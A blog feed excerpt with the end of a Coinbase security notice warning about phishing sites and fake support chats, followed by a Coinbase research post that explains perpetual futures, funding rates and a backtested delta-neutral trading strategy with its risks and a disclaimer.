After you enter your credentials, are you prompted to call Coinbase because of some sort of error? Does a live chat box automatically open? This tactic is commonly paired with phishing attacks and is known as a “support scam” attack.

Here is an example of what a scam error may look like and a live chat box which may follow the error:

Remember, think before you click! Our US support phone number is 1–888–908–7930 and you can find other ways to contact us at help.coinbase.com. If you are suspicious of activity on a “Coinbase” website, go to our Help page and initiate a conversation there with our Support team.

We are constantly monitoring the internet to identify phishing domains and take them down, but we need your help. Please help us by reporting any suspicious domains to security@coinbase.com.

Security PSA: Search engine phishing was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Quantitative Crypto Insight: A systematic crypto trading strategy using perpetual futures

July 14, 2022 Coinbase

coinbase

Tl;dr: Perpetuals futures are financial instruments that have become increasingly popular in the crypto space. Coinbase demonstrates a hypothetical simple delta neutral strategy which takes advantage of positively skewed funding rates in the perpetual futures market to achieve a high return on investment.

By The Coinbase Data Science Quantitative Research Team

Systematic Trading Strategy

A systematic trading strategy is a mechanical way of trading that is aimed at exploiting certain aspects of market inefficiencies to achieve investment goals. These strategies employ disciplined, rule-based trading that can be easily backtested with historical market data. Rule-based trading follows strict, predefined trading methodologies that are not impacted by market conditions.

Systematic trading is a fully grown area of investing that spans a wide range of strategies and asset classes. With the ever-growing crypto market, in which thousands of tokens are being traded and derivatives offerings are being expanded, systematic trading will play an important role in goal-based investing with efficient capital allocation and rigorous risk management. In this piece, we explore a delta neutral strategy to demonstrate the basic building blocks of systematic trading.

Spot market and derivative market terms:

Spot Trading: Buying or selling assets that results in its immediate transfer of ownership. For crypto spot trading, one can directly buy or sell crypto assets via centralized exchange, retail broker, or decentralized exchanges. (For example: Coinbase Prime, Coinbase Exchange)

Derivatives Trading: Derivatives are financial contracts whose values are dependent on underlying assets. These contracts are set between two parties and can trade over a centralized/decentralized exchange or over-the-counter (OTC). A futures contract, one of the most popular derivatives, obligates parties to transact an underlying asset at a future date at a predetermined price. Derivatives, such as futures, are highly regulated financial instruments. For example in the United States, the CFTC regulated the derivatives market including commodity futures, options and swaps market as well as over-the-counter markets.

Delta and Delta Neutral: The delta measures the rate of change of the derivative contract’s price with respect to changes in the underlying asset’s price. For the underlying asset itself S, it is called delta one because the rate of change of S relative to itself is 1. Futures contracts that track closely the underlying asset, are approximately delta one. To achieve a delta neutral portfolio, one can take offsetting positions in spot and derivatives markets to construct a portfolio with an overall delta equal to zero. The zero/neutral delta portfolio is not subject to underlying price movements.

Perpetual futures

Perpetual futures have become a popular way to trade crypto assets. Unlike traditional futures that have expirations and associated delivery or settlement dates, perpetual futures don’t expire. These instruments are periodically cash settled with funding rate payment and there is no actual delivery of the underlying assets. Perpetual futures have to be either closed out to exit or held indefinitely.

Perpetual futures have their value closely pegged to the underlying assets they track with a funding payment mechanism built into the contract. It allows investors to easily take directional positions without worrying about physical delivery of the underlying assets. Perpetual futures have several advantages: it’s easy to take long or short positions, contracts can have high leverage, and there is no expiration to the contract — eliminating the need to roll futures.

We will use two scenarios to illustrate how the funding payment mechanism works:

When perpetual futures are traded at a premium to spot prices, the funding rate is positive. Long futures traders will pay the short counterparty a funding amount proportional to the funding rate determined by the exchange.
When perpetual futures are traded at a discount to spot prices, the funding rate is negative. Short futures traders will pay the long counterparty.

For illustrative purposes only.

As illustrated above, the larger the futures price diverges from the spot price, the bigger funding payment will be exchanged under a clamp threshold from exchanges. It’s an effective way to balance the supply and demand in the futures market and hence keep futures tightly anchored to underlying assets.

Systematic trading strategy with perpetual futures

Based on the above discussions, we explore a systematic delta neutral trading strategy that monetizes the rich funding rate in the perpetual futures market. A one-step setup of initial positions is required and no further rebalance is needed. We first take a long position on the underlying asset, at the same time take a short position on the perpetual future with the same notional. Given that the price of a perpetual future closely follows its underlying asset, the net position is delta neutral and has little exposure to the price movement of underlying assets. The strategy draws its performance from the funding rate payments since it is on the short side of the perpetual market.

Below is how it can be set up with BTC and BTC-PERP on 2x leverage:

Deposit USD Y amount as collateral
Long BTC with notional 2xY
Short BTC-PERP with notional 2xY
Every 1 hour, the position either collects or pays the funding on 2xY BTC-PERP position.

Here’s an example of a one period performance:

A trader opens a long position on Bitcoin. The open price was $9,910 USD and position size was 2 BTC. The trader at the same time opens a short position on BTC-PERP at $10,000 and with position size 2*9,910/10,000 = 1.982.

If the price of Bitcoin then increases to 12,500 USD and BTC-PERP increases to 12,613, the unrealized profit from BTC position is 2*(12,500–9,910) = 5,180, and unrealized loss from BTC-PERP position is -1.982*(12,613–10,000) = -5,180. The profit and loss offset each other nicely. During the same period, if we assume a funding rate of 0.3%, we will collect a payment of 10,000 * 1.982 * 0.3% = 59.5. With periodic funding payments, the strategy accrues over time.

In our backtest, we deposit USD $1MM as our collateral and then enter into BTC long positions and BTC-PERP short positions with the same amount of notional. Given the strategy has minimum risk to the underlying price fluctuation, we can leverage up our positions by 10x and the leverage ratio stays stable through the period with negligible auto-deleverage/liquidation risk. With a holding period of approximately 1Y, the strategy performed with a return of ~40%.

Data source: Coinbase and FTX

In order to confirm the achieved performance, backtests with different holding periods and different entry/exit dates were performed: 1 month, 3 months, and 6 months. The table below shows median metrics related to these backtests:

Data source: Coinbase and FTX

From the simulations above, the longer the holding period, the higher the annualized return.

We just demonstrated a systematic trading strategy with spot BTC and perpetual futures. It is a basic strategy that only requires the initial setup of spot and derivative positions; no further active position management is needed before closing out. To make the strategy more robust, one can devise additional trading rules for risk management under market stress scenarios. It will also be interesting to explore ideas on running more dynamic trading rules that adjust leverage ratio to enhance return.

Funding rate

The core of the strategy is funding arbitrage between the perpetual futures market and fiat currency borrowing. Below we take a closer look at the funding rate distributions in the futures market. The rate is concentrated in the bucket around 2%, which can be thought of as a breakeven rate. But there is a long positive skewed tail which contributes to our strategy’s performance.

Data source: FTX

Below we also look at the autocorrelation function (ACF) of funding rate to understand how past observations are correlated to future occurrences. It is clear from the autocorrelogram below that the funding rate itself exhibits serial correlation up to about 20 days.

Data source: FTX

It is also interesting to see how funding rate and spot prices are related. It is evident from the below chart that when spot prices quickly move up, so is the funding rate. And the reverse applies as well.

Data source: Coinbase and FTX

When spots are quickly ramping up, trend followers are chasing the market, possibly with leveraged positions in the futures market. The demand for funding in the futures market pushes up funding costs. When the market takes a downturn, there is less appetite for funding, so funding costs decrease and can even go negative.

Risk analysis

Execution risk for delta PnL offsetting. We demonstrated a delta neutral strategy for which PnL from spot leg and perpetual futures leg offset from each other is expected. Oftentimes, prices between spot and futures could diverge and cause non-trivial delta PnL. This can be mitigated by entering into/existing from the positions gradually in relatively small sizes.

Slippage cost, the effective price paid/received when Coinbase executes orders against an exchange or DEX. When the order size is big compared to order book depth, advanced trading algorithms are necessary to mitigate slippage cost.

Funding rate risk, funding rate is stochastic. It can fluctuate above/below zero. When the rate drifts below zero, the strategy underperforms. Historical markets showed a positively skewed funding rate distribution. However, there is no guarantee of its path in the future.

Leverage risk, auto-deleveraging/liquidation. In order to have a sizable return, the strategy has to be levered up. Given the strategy is delta neutral, it’s safe to run 10x leverage under normal market conditions. However, in a stressed market when spot price and perpetual futures price diverge for a prolonged period of time, the strategy bears risk of auto-delverage or even liquidation, which could result in significant capital losses.

Future directions

We have demonstrated how to run a systematic trading strategy in the crypto market with a basic one-step setup. Systematic trading in crypto is an uncharted territory in which many of the existing strategies in traditional financial markets could be equally applicable. However, with innovations coming from different angles (e.g, decentralized exchanges, liquidity pools, DeFi lending/borrowing) many new opportunities and possibilities arise as a result. We, as part of the Data Science Quantitative Research team, aim to develop and research in this space from a quantitative perspective that can be used to drive new Coinbase products.

You can track crypto spot and derivatives markets with Coinbase Prime analytics, a set of institution-focused market data features that provide real-time and historical analytics for cryptocurrency spot and derivatives markets. Being elegant and user-friendly, Coinbase Prime analytics features provide a comprehensive analytics toolkit built to meet the needs of sophisticated investors and market participants.

The team would like to thank Guofan Hu and Nabil Benbada for their contributions to this research piece.

Disclaimer: This content is being provided to you for informational purposes only. This is not financial or investment advice and the content on this page and any information contained therein, does not constitute a recommendation by Coinbase to buy, sell or hold any security, derivatives or similar financial product or instrument referenced in the content. The hypothetical strategy referenced herein is for demonstration purposes only and is not an endorsement or recommendation of a particular trading strategy . Real trading, including trading in the types of instruments identified in this document carries risks not limited to operational risk, strategy risk, etc and can incur significant loss. Public FTX market data is used for the backtest.

Quantitative Crypto Insight: A systematic crypto trading strategy using perpetual futures was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

coinbase-eng